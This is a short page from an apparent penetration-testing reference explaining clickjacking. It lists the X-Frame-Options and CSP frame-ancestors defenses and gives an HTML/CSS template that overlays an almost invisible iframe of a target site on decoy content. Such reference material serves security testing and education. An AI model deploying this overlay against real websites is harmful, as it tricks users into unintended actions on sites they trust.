Pentest Book
Search…
Clickjacking

General

Clickjacking is an interface-based attack in which a user is tricked into clicking on actionable content on a hidden website by clicking on some other content in a decoy website.
    Preventions:
      X-Frame-Options: deny/sameorigin/allow-from
      CSP: policy/frame-ancestors 'none/self/domain.com'
1
# An example using the style tag and parameters is as follows:
2
<head>
3
<style>
4
#target_website {
5
position:relative;
6
width:128px;
7
height:128px;
8
opacity:0.00001;
9
z-index:2;
10
}
11
#decoy_website {
12
position:absolute;
13
width:300px;
14
height:400px;
15
z-index:1;
16
}
17
</style>
18
</head>
19
...
20
<body>
21
<div id="decoy_website">
22
...decoy web content here...
23
</div>
24
<iframe id="target_website" src="https://vulnerable-website.com">
25
</iframe>
26
</body>
Copied!
Last modified 1yr ago
Export as PDF
Copy link